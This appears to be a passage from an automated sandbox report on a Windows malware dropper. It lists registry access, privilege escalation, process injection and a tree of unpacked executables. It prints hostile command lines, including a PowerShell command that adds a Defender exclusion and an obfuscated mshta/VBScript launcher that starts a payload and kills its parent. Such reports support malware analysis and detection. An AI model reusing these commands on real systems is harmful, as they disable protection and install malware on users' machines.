Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 548 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 548 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 548 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4196 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
PID 4196 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
PID 4196 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
PID 4604 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 216 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 216 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 216 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4604 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4604 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2320 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe
PID 2320 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe
PID 2320 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe
PID 3232 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe
PID 3232 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe
PID 3232 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe
PID 4156 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe

Processes

C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe

"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe

Fri2050293ea5.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe

Fri2002ce5f91c761.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe

Fri20109b9e174d0fc.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe

Fri20ba391d4469.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe

Fri20ee0a6fe195bd09.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe

Fri209f6924af86d795.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe

Fri20d5530575e8aa3ed.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe

Fri208f5f140853548.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe

Fri20e095683c2b3a0c.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe

Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe

Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe

Fri2060ea1c5d8fae8aa.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4604 -ip 4604

C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$50278,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 612

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

